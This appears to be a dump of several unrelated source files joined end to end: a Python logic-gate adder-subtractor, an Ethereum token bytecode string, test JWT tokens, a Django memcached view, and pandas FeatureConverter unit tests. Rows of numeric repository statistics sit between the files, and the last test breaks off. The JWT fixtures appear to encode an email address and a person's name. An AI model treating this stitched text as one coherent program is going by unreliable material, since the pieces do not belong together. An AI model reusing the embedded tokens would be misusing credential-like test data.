raise TypeError(
"Expected bus of width 8, received bus of width {0}.".format(
len(a_bus.wires)
)
)
if len(b_bus.wires) != 8:
raise TypeError(
"Expected bus of width 8, received bus of width {0}.".format(
len(b_bus.wires)
)
)
if len(sum_bus.wires) != 8:
raise TypeError(
"Expected bus of width 8, received bus of width {0}.".format(
len(sum_bus.wires)
)
)
wire_1 = Wire()
wire_2 = Wire()
wire_3 = Wire()
wire_4 = Wire()
wire_5 = Wire()
wire_6 = Wire()
wire_7 = Wire()
wire_8 = Wire()
not_input_1 = Wire()
not_input_2 = Wire()
not_output = Wire()
and_1_wire = Wire()
and_2_wire = Wire()
bus_1 = Bus8(
wire_1,
wire_2,
wire_3,
wire_4,
wire_5,
wire_6,
wire_7,
wire_8
)
input_1 = a_bus.wires
input_2 = b_bus.wires
output = sum_bus.wires
signal.ControlledInverter8(add_subtract, b_bus, bus_1)
ADD.Adder8(add_subtract, a_bus, bus_1, carry_out, sum_bus)
gate.NOTGate(input_1[0], not_input_1)
gate.NOTGate(input_2[0], not_input_2)
gate.NOTGate(output[0], not_output)
gate.ANDGate3(input_1[0], not_input_2, not_output, and_1_wire)
gate.ANDGate3(not_input_1, input_2[0], output[0], and_2_wire)
gate.ORGate2(and_1_wire, and_2_wire, overflow)
self.add_subtract = add_subtract
self.a_bus = a_bus
self.b_bus = b_bus
self.overflow = overflow
self.carry_out = carry_out
self.sum_bus = sum_bus
def __str__(self):
str_ = ""
str_ += "add_subtract: " + str(self.add_subtract.value) + "\n"
str_ += "a_bus: " + self.a_bus.__str__() + "\n"
str_ += "b_bus: " + self.b_bus.__str__() + "\n"
str_ += "overflow: " + str(self.overflow.value) + "\n"
str_ += "carry_out: " + str(self.carry_out.value) + "\n"
str_ += "sum_bus: " + self.sum_bus.__str__()
return str_
def __call__(
self, *,
add_subtract=None,
a_bus=None,
b_bus=None,
overflow=None,
carry_out=None,
sum_bus=None
):
if add_subtract is not None:
self.add_subtract.value = add_subtract
if a_bus is not None:
self.a_bus.wire_values = a_bus
if b_bus is not None:
self.b_bus.wire_values = b_bus
if overflow is not None:
self.overflow.value = overflow
if carry_out is not None:
self.carry_out.value = carry_out
if sum_bus is not None:
self.sum_bus.wire_values = sum_bus
class AdderSubtractor16:
"""Construct a new 16-bit adder-subtractor.
Args:
add_subtract: An object of type Wire. Indicates the operation to carry
out - 0 for addition, 1 for subtraction.
a_bus: An object of type Bus16. The first addend, or the minuend.
a_bus[0] and a_bus[15] are the most and least significant bit,
respectively. a_bus[0] is the sign bit in subtraction operations.
b_bus: An object of type Bus16. The second addend, or the subtrahend.
b_bus[0] and b_bus[15] are the most and least significant bit,
respectively. b_bus[0] is the sign bit in subtraction operations.
overflow: An object of type Wire. The overflow indicator of the
subtractor.
carry_out: An object of type Wire. The carry-out of the adder.
sum_bus: An object of type Bus16. The sum of the two addends, or the
difference between the minuend and the subtrahend. sum_bus[0] and
sum_bus[15] are the most and least significant bit, respectively.
sum_bus[0] is the sign bit in subtraction operations.
Raises:
TypeError: If either a_bus, b_bus, or sum_bus is not a bus of width 16.
"""
def __init__(
self,
add_subtract,
a_bus,
b_bus,
overflow,
carry_out,
sum_bus
):
if len(a_bus.wires) != 16:
raise TypeError(
"Expected bus of width 16, received bus of width {0}.".format(
len(a_bus.wires)
)
)
if len(b_bus.wires) != 16:
raise TypeError(
"Expected bus of width 16, received bus of width {0}.".format(
len(b_bus.wires)
)
)
if len(sum_bus.wires) != 16:
raise TypeError(
"Expected bus of width 16, received bus of width {0}.".format(
len(sum_bus.wires)
)
)
wire_1 = Wire()
wire_2 = Wire()
wire_3 = Wire()
wire_4 = Wire()
wire_5 = Wire()
wire_6 = Wire()
wire_7 = Wire()
wire_8 = Wire()
wire_9 = Wire()
wire_10 = Wire()
wire_11 = Wire()
wire_12 = Wire()
wire_13 = Wire()
wire_14 = Wire()
wire_15 = Wire()
wire_16 = Wire()
not_input_1 = Wire()
not_input_2 = Wire()
not_output = Wire()
and_1_wire = Wire()
and_2_wire = Wire()
bus_1 = Bus16(
wire_1,
wire_2,
wire_3,
wire_4,
wire_5,
wire_6,
wire_7,
wire_8,
wire_9,
wire_10,
wire_11,
wire_12,
wire_13,
wire_14,
wire_15,
wire_16
)
input_1 = a_bus.wires
input_2 = b_bus.wires
output = sum_bus.wires
signal.ControlledInverter16(add_subtract, b_bus, bus_1)
ADD.Adder16(add_subtract, a_bus, bus_1, carry_out, sum_bus)
gate.NOTGate(input_1[0], not_input_1)
gate.NOTGate(input_2[0], not_input_2)
gate.NOTGate(output[0], not_output)
gate.ANDGate3(input_1[0], not_input_2, not_output, and_1_wire)
gate.ANDGate3(not_input_1, input_2[0], output[0], and_2_wire)
gate.ORGate2(and_1_wire, and_2_wire, overflow)
self.add_subtract = add_subtract
self.a_bus = a_bus
self.b_bus = b_bus
self.overflow = overflow
self.carry_out = carry_out
self.sum_bus = sum_bus
def __str__(self):
str_ = ""
str_ += "add_subtract: " + str(self.add_subtract.value) + "\n"
str_ += "a_bus: " + self.a_bus.__str__() + "\n"
str_ += "b_bus: " + self.b_bus.__str__() + "\n"
str_ += "overflow: " + str(self.overflow.value) + "\n"
str_ += "carry_out: " + str(self.carry_out.value) + "\n"
str_ += "sum_bus: " + self.sum_bus.__str__()
return str_
def __call__(
self, *,
add_subtract=None,
a_bus=None,
b_bus=None,
overflow=None,
carry_out=None,
sum_bus=None
):
if add_subtract is not None:
self.add_subtract.value = add_subtract
if a_bus is not None:
self.a_bus.wire_values = a_bus
if b_bus is not None:
self.b_bus.wire_values = b_bus
if overflow is not None:
self.overflow.value = overflow
if carry_out is not None:
self.carry_out.value = carry_out
if sum_bus is not None:
self.sum_bus.wire_values = sum_bus
| 32.914634
| 79
| 0.558133
| 1,867
| 13,495
| 3.76647
| 0.059989
| 0.032423
| 0.029863
| 0.035836
| 0.929181
| 0.929181
| 0.929181
| 0.914249
| 0.911405
| 0.911405
| 0
| 0.03177
| 0.353909
| 13,495
| 409
| 80
| 32.99511
| 0.774745
| 0.257058
| 0
| 0.780328
| 0
| 0
| 0.068154
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029508
| false
| 0
| 0.013115
| 0
| 0.062295
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
145d3ea9060b7295f0b7e5b21153fbe39e93cf1f
| 12,213
|
py
|
Python
|
tradingdb/relationaldb/tests/utils.py
|
gnosis/gnosisdb
|
b3055406fba7061c3677bfd16e19f8bc5c97db2c
|
[
"MIT"
] | 11
|
2017-06-23T15:35:10.000Z
|
2018-04-27T06:11:25.000Z
|
tradingdb/relationaldb/tests/utils.py
|
gnosis/gnosisdb
|
b3055406fba7061c3677bfd16e19f8bc5c97db2c
|
[
"MIT"
] | 42
|
2018-01-17T15:46:33.000Z
|
2018-05-08T08:13:17.000Z
|
tradingdb/relationaldb/tests/utils.py
|
gnosis/gnosisdb
|
b3055406fba7061c3677bfd16e19f8bc5c97db2c
|
[
"MIT"
] | 12
|
2017-07-03T15:51:41.000Z
|
2018-03-25T17:31:54.000Z
|
tournament_token_bytecode = "0x608060405233600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611776806100546000396000f3006080604052600436106100fc576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806302d05d3f1461010157806306fdde0314610158578063095ea7b3146101e8578063136ef18a1461024d57806318160ddd146102b357806323b872dd146102de578063313ce567146103635780633d0950a81461039457806342958b54146103fa578063429b62e51461046a5780636105c94b146104c557806370a08231146104f457806395d89b411461054b5780639b19251a146105db578063a9059cbb14610636578063ae876f611461069b578063bbc8e3cb14610701578063dd62ed3e14610767575b600080fd5b34801561010d57600080fd5b506101166107de565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561016457600080fd5b5061016d610804565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156101ad578082015181840152602081019050610192565b50505050905090810190601f1680156101da5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156101f457600080fd5b50610233600480360381019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061083d565b604051808215151515815260200191505060405180910390f35b34801561025957600080fd5b506102b16004803603810190808035906020019082018035906020019080806020026020016040519081016040528093929190818152602001838360200280828437820191505050505050919291929050505061092f565b005b3480156102bf57600080fd5b506102c8610a76565b6040518082815260200191505060405180910390f35b3480156102ea57600080fd5b50610349600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610a80565b604051808215151515815260200191505060405180910390f35b34801561036f57600080fd5b50610378610b42565b604051808260ff1660ff16815260200191505060405180910390f35b3480156103a057600080fd5b506103f860048036038101908080359060200190820180359060200190808060200260200160405190810160405280939291908181526020018383602002808284378201915050505050509192919290505050610b47565b005b34801561040657600080fd5b506104686004803603810190808035906020019082018035906020019080806020026020016040519081016040528093929190818152602001838360200280828437820191505050505050919291929080359060200190929190505050610c33565b005b34801561047657600080fd5b506104ab600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610ddc565b604051808215151515815260200191505060405180910390f35b3480156104d157600080fd5b506104da610dfc565b604051808215151515815260200191505060405180910390f35b34801561050057600080fd5b50610535600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610e01565b6040518082815260200191505060405180910390f35b34801561055757600080fd5b50610560610e49565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156105a0578082015181840152602081019050610585565b50505050905090810190601f1680156105cd5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156105e757600080fd5b5061061c600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610e82565b604051808215151515815260200191505060405180910390f35b34801561064257600080fd5b50610681600480360381019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610ea2565b604051808215151515815260200191505060405180910390f35b3480156106a757600080fd5b506106ff60048036038101908080359060200190820180359060200190808060200260200160405190810160405280939291908181526020018383602002808284378201915050505050509192919290505050610f62565b005b34801561070d57600080fd5b506107656004803603810190808035906020019082018035906020019080806020026020016040519081016040528093929190818152602001838360200280828437820191505050505050919291929050505061104e565b005b34801561077357600080fd5b506107c8600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611195565b6040518082815260200191505060405180910390f35b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6040805190810160405280600d81526020017f4f6c796d70696120546f6b656e0000000000000000000000000000000000000081525081565b600081600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040518082815260200191505060405180910390a36001905092915050565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614806109dd575060011515600560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515145b15156109e857600080fd5b600090505b8151811015610a72576001600460008484815181101515610a0a57fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806001019150506109ed565b5050565b6000600254905090565b6000600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610b235750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1515610b2e57600080fd5b610b3984848461121c565b90509392505050565b601281565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610ba557600080fd5b600090505b8151811015610c2f576001600560008484815181101515610bc757fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050610baa565b5050565b600080600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610c9257600080fd5b600091505b8351821015610da8578382815181101515610cae57fe5b906020019060200201519050610d0b836000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461150190919063ffffffff16565b6000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508073ffffffffffffffffffffffffffffffffffffffff167f9cb9c14f7bc76e3a89b796b091850526236115352a198b1e472f00e91376bbcb846040518082815260200191505060405180910390a28180600101925050610c97565b610dd0610dbf85518561152390919063ffffffff16565b60025461150190919063ffffffff16565b60028190555050505050565b60056020528060005260406000206000915054906101000a900460ff1681565b600181565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6040805190810160405280600381526020017f4f4c59000000000000000000000000000000000000000000000000000000000081525081565b60046020528060005260406000206000915054906101000a900460ff1681565b6000600460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610f455750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1515610f5057600080fd5b610f5a8383611545565b905092915050565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610fc057600080fd5b600090505b815181101561104a576000600560008484815181101515610fe257fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080600101915050610fc5565b5050565b6000600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614806110fc575060011515600560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515145b151561110757600080fd5b600090505b815181101561119157600060046000848481518110151561112957fe5b9060200190602002015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808060010191505061110c565b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600061126f826000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461170890919063ffffffff16565b1580611307575061130582600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461170890919063ffffffff16565b155b80611360575061135e826000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461171690919063ffffffff16565b155b1561136e57600090506114fa565b816000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a3600190505b9392505050565b600061150d8383611716565b151561151857600080fd5b818301905092915050565b600061152f8383611726565b151561153a57600080fd5b818302905092915050565b6000611598826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461170890919063ffffffff16565b15806115f257506115f0826000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461171690919063ffffffff16565b155b156116005760009050611702565b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a3600190505b92915050565b600081831015905092915050565b6000828284011015905092915050565b6000808214806117425750828283850281151561173f57fe5b04145b9050929150505600a165627a7a723058205e5821735c824c73df5e6600554ce48b350410c6c3602c9b74f92af5b46eefdf0029"
| 6,106.5
| 12,212
| 0.999509
| 4
| 12,213
| 3,051.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.634971
| 0.000246
| 12,213
| 1
| 12,213
| 12,213
| 0.364619
| 0
| 0
| 0
| 0
| 0
| 0.997462
| 0.997462
| 0
| 1
| 0.997462
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
14a796965ec7f09f47a00c7f1ad7492a84deaf81
| 1,078
|
py
|
Python
|
carmesi/nucleo/tests/constant.py
|
RedGranatum/Carmesi
|
bde1d4dd104401ba08e7ba2f3de5b9d5f537dd94
|
[
"MIT"
] | null | null | null |
carmesi/nucleo/tests/constant.py
|
RedGranatum/Carmesi
|
bde1d4dd104401ba08e7ba2f3de5b9d5f537dd94
|
[
"MIT"
] | null | null | null |
carmesi/nucleo/tests/constant.py
|
RedGranatum/Carmesi
|
bde1d4dd104401ba08e7ba2f3de5b9d5f537dd94
|
[
"MIT"
] | null | null | null |
TOKEN_PREALTA_CLIENTE = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InJhdWx0ckBnbWFpbC5jb20iLCJleHAiOjQ3MzM1MTA0MDAsIm93bmVyX25hbWUiOiJSYXVsIEVucmlxdWUgVG9ycmVzIFJleWVzIiwidHlwZSI6ImVtYWlsX2NvbmZpcm1hdGlvbl9uZXdfY2xpZW50In0.R-nXh1nXvlBABfEdV1g81mdIzJqMFLvFV7FAP7PQRCM'
TOKEN_PREALTA_CLIENTE_CADUCO = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibGF0aWVuZGl0YTJAZ2FtaWwuY29tIiwib3duZXJfbmFtZSI6IkFuZ2VsIEdhcmNpYSIsImV4cCI6MTU4NjU3ODg1MCwidHlwZSI6ImVtYWlsX2NvbmZpcm1hdGlvbl9uZXdfY2xpZW50In0.x66iQug11cjmkUHqmZq68gdbN3ffSVyD9MHagrspKRw'
TOKEN_PREALTA_USUARIO = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InJhdWx0ckBnbWFpbC5jb20iLCJleHAiOjQ3MzM1MTA0MDAsIm5hbWUiOiJSYXVsIEVucmlxdWUgVG9ycmVzIFJleWVzIiwic2NoZW1hX25hbWUiOiJtaXRpZW5kaXRhIiwidHlwZSI6ImVtYWlsX2NvbmZpcm1hdGlvbl9uZXdfdXNlciJ9.gcagbNxnNxIkgZbP0mu-9MudiFb9b6cKvttPF4EHH5E'
TOKEN_USUARIO_LOGIN = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InJhdWx0ckBnbWFpbC5jb20iLCJleHAiOjQ3MzM1MTA0MDAsInNjaGVtYV9uYW1lIjoibWl0aWVuZGl0YSIsInR5cGUiOiJ1c2VyX2xvZ2luIn0.vCdeH0iP94XBucXYtWZvEQq7CuEr-P80SdfIjN673qI'
| 119.777778
| 299
| 0.963822
| 28
| 1,078
| 36.785714
| 0.642857
| 0.034951
| 0.036893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119586
| 0.014842
| 1,078
| 8
| 300
| 134.75
| 0.850282
| 0
| 0
| 0
| 0
| 0
| 0.892293
| 0.892293
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21308689b917b00024ac6bc365d471accdf44ba5
| 115
|
py
|
Python
|
portal/apps/memcached/views.py
|
Artis-Physis/utopia-cms
|
5cb8d941d0b2df53fddc566a52e9d3baee4a007e
|
[
"BSD-3-Clause"
] | 8
|
2020-12-15T17:11:08.000Z
|
2021-12-13T22:08:33.000Z
|
portal/apps/memcached/views.py
|
Artis-Physis/utopia-cms
|
5cb8d941d0b2df53fddc566a52e9d3baee4a007e
|
[
"BSD-3-Clause"
] | 28
|
2020-12-15T17:34:03.000Z
|
2022-02-01T04:09:10.000Z
|
portal/apps/memcached/views.py
|
Artis-Physis/utopia-cms
|
5cb8d941d0b2df53fddc566a52e9d3baee4a007e
|
[
"BSD-3-Clause"
] | 7
|
2020-12-15T19:59:17.000Z
|
2021-11-24T16:47:06.000Z
|
# -*- coding: utf-8 -*-
from memcached_status import view
def memcached_status(request):
return view(request)
| 19.166667
| 33
| 0.721739
| 15
| 115
| 5.4
| 0.733333
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.156522
| 115
| 5
| 34
| 23
| 0.824742
| 0.182609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2133e069ca87fe3a4720d2db5fafd837b8a54846
| 7,512
|
py
|
Python
|
dstools/tests/preprocessing/test_FeatureConverter.py
|
Diadochokinetic/DataScienceTools
|
a5701888eeeab8fadab17266e9b3bb7a6b6b7b0a
|
[
"MIT"
] | null | null | null |
dstools/tests/preprocessing/test_FeatureConverter.py
|
Diadochokinetic/DataScienceTools
|
a5701888eeeab8fadab17266e9b3bb7a6b6b7b0a
|
[
"MIT"
] | 3
|
2019-11-14T09:10:43.000Z
|
2019-11-25T13:16:08.000Z
|
dstools/tests/preprocessing/test_FeatureConverter.py
|
Diadochokinetic/DataScienceTools
|
a5701888eeeab8fadab17266e9b3bb7a6b6b7b0a
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import unittest
from dstools.preprocessing.FeatureConverter import FeatureConverter
class TestFeatureConverter(unittest.TestCase):
"""
=======================
=== type conversion ===
=======================
"""
def test_int_to_string(self):
"""
int values should be converted to string
"""
df=pd.DataFrame({'int':[1,2,3,4]})
df_transformed_correct=pd.DataFrame({'int':['1','2','3','4']})
df_transformed = FeatureConverter(columns_to_string='int').fit_transform(df)
for x, y in zip(df_transformed['int'], df_transformed_correct['int']):
self.assertEqual(x, y)
def test_float_to_string(self):
"""
int values should be converted to string
"""
df=pd.DataFrame({'float':[1.2,2.2,3.2,4.2]})
df_transformed_correct=pd.DataFrame({'float':['1.2','2.2','3.2','4.2']})
df_transformed = FeatureConverter(columns_to_string='float').fit_transform(df)
for x, y in zip(df_transformed['float'], df_transformed_correct['float']):
self.assertEqual(x, y)
def test_string_to_int(self):
"""
string values should be converted to int
"""
df=pd.DataFrame({'string':['1','2','3','4']})
df_transformed_correct=pd.DataFrame({'string':[1,2,3,4]})
df_transformed = FeatureConverter(columns_to_int='string').fit_transform(df)
for x, y in zip(df_transformed['string'], df_transformed_correct['string']):
self.assertEqual(x, y)
def test_float_to_int(self):
"""
float values should be converted to int
"""
df=pd.DataFrame({'float':[1.2,2.2,2.9,4.3]})
df_transformed_correct=pd.DataFrame({'float':[1,2,3,4]})
df_transformed = FeatureConverter(columns_to_int='float').fit_transform(df)
for x, y in zip(df_transformed['float'], df_transformed_correct['float']):
self.assertEqual(x, y)
def test_string_to_float(self):
"""
string values should be converted to float
"""
df=pd.DataFrame({'string':['1.2','2.2','3.2','4.2']})
df_transformed_correct=pd.DataFrame({'string':[1.2,2.2,3.2,4.2]})
df_transformed = FeatureConverter(columns_to_float='string').fit_transform(df)
for x, y in zip(df_transformed['string'], df_transformed_correct['string']):
self.assertEqual(x, y)
def test_int_to_float(self):
"""
int values should be converted to float
"""
df=pd.DataFrame({'int':[1,2,3,4]})
df_transformed_correct=pd.DataFrame({'int':[1.0,2.0,3.0,4.0]})
df_transformed = FeatureConverter(columns_to_float='int').fit_transform(df)
for x, y in zip(df_transformed['int'], df_transformed_correct['int']):
self.assertEqual(x, y)
"""
===================
=== replacement ===
===================
"""
def test_replace_one_value(self):
"""
single value should be replaced
"""
df=pd.DataFrame({'int':[1,2,3,4]})
df_transformed_correct = pd.DataFrame({'int':[42,2,3,4]})
df_transformed = FeatureConverter(columns_with_replace={'int':{1:42}}).fit_transform(df)
for x, y in zip(df_transformed['int'], df_transformed_correct['int']):
self.assertEqual(x, y)
def test_replace_two_values(self):
"""
two values should be replaced
"""
df=pd.DataFrame({'string':['1','2','3','4']})
df_transformed_correct = pd.DataFrame({'string':['hello','world','3','4']})
df_transformed = FeatureConverter(columns_with_replace={'string':{'1':'hello','2':'world'}}).fit_transform(df)
for x, y in zip(df_transformed['string'], df_transformed_correct['string']):
self.assertEqual(x, y)
def test_replace_two_columns(self):
"""
values in multiple columns should be replaced
"""
df=pd.DataFrame({'int':[1,2,3,4], 'string':['1','2','3','4']})
df_transformed_correct = pd.DataFrame({'int':[42,2,3,4], 'string':['hello','world','3','4']})
df_transformed = FeatureConverter(columns_with_replace={'int':{1:42}, 'string':{'1':'hello','2':'world'}}).fit_transform(df)
for x, y in zip(df_transformed['string'], df_transformed_correct['string']):
self.assertEqual(x, y)
for x, y in zip(df_transformed['int'], df_transformed_correct['int']):
self.assertEqual(x, y)
"""
====================
=== create flags ===
====================
"""
def test_one_flag(self):
"""
one flag should be created
"""
df=pd.DataFrame({'int':[1,2,3,4]})
df_transformed_correct=pd.DataFrame({'int':[1,2,3,4], 'int_1':[1,0,0,0]})
df_transformed=FeatureConverter(value_flags={'int':[1]}).fit_transform(df)
for x, y in zip(df_transformed['int_1'], df_transformed_correct['int_1']):
self.assertEqual(x, y)
def test_two_flags(self):
"""
two flags should be created
"""
df=pd.DataFrame({'int':[1,2,3,4]})
df_transformed_correct=pd.DataFrame({'int':[1,2,3,4], 'int_1':[1,0,0,0], 'int_2':[0,1,0,0]})
df_transformed=FeatureConverter(value_flags={'int':[1,2]}).fit_transform(df)
for x, y in zip(df_transformed['int_1'], df_transformed_correct['int_1']):
self.assertEqual(x, y)
for x, y in zip(df_transformed['int_2'], df_transformed_correct['int_2']):
self.assertEqual(x, y)
def test_multiple_flags(self):
"""
multiple flags should be created
"""
df=pd.DataFrame({'int':[1,2,3,4], 'string':['1','2','3','4']})
df_transformed_correct=pd.DataFrame({'int':[1,2,3,4], 'string':['1','2','3','4'], 'int_1':[1,0,0,0], 'int_2':[0,1,0,0], 'string_1':[1,0,0,0]})
df_transformed=FeatureConverter(value_flags={'int':[1,2], 'string':['1']}).fit_transform(df)
for x, y in zip(df_transformed['int_1'], df_transformed_correct['int_1']):
self.assertEqual(x, y)
for x, y in zip(df_transformed['int_2'], df_transformed_correct['int_2']):
self.assertEqual(x, y)
for x, y in zip(df_transformed['string_1'], df_transformed_correct['string_1']):
self.assertEqual(x, y)
"""
===================
=== drop column ===
===================
"""
def test_drop_one(self):
"""
one column should be dropped
"""
df=pd.DataFrame({'string1':['1','2','3','4'],'string2':['1','2','3','4'],'int':[1,2,3,4]})
